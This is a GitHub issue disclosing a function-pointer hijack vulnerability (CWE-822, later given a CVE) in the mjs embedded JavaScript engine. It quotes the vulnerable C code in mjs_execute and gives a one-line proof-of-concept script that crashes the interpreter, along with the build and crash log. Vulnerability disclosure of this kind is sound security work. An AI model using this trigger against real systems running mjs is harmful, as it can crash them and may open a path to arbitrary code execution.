search

cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com
Other
1.84k stars 171 forks source link

Function Pointer Hijack mjs/mjs.c in mjs_execute #250

Open cla7aye15I4nd opened 11 months ago

cla7aye15I4nd commented 11 months ago

Function Pointer Hijack mjs/mjs.c in mjs_execute

Affected Projects

mjs 2.20.0 (https://github.com/cesanta/mjs)

Problem Type

CWE-822 (Untrusted Pointer Dereference)

Description

I discovered a vulnerability that could potentially lead to function pointer hijacking. I believe this is a logical vulnerability since it does not trigger any out-of-bounds (OOB) or use-after-free (UAF) assertions when compiled with AddressSanitizer. An attacker can exploit this vulnerability by providing a specially crafted input to the affected program, leading to the execution of arbitrary code.

The function hijack happend in mjs.c:8824

call_stack_push_frame(mjs, bp.start_idx + i, retval_stack_idx);

/* Perform the cfunction call */
((void (*) (struct mjs *)) mjs_get_ptr(mjs, *func))(mjs);

call_stack_restore_frame(mjs);

PoC:

print-=2;print("A");

Log:

$ clang -g -O2 -o mjs mjs.c -DMJS_MAIN
$ ./mjs poc.js 
Illegal instruction
cla7aye15I4nd commented 11 months ago

Assigned CVE-2023-43338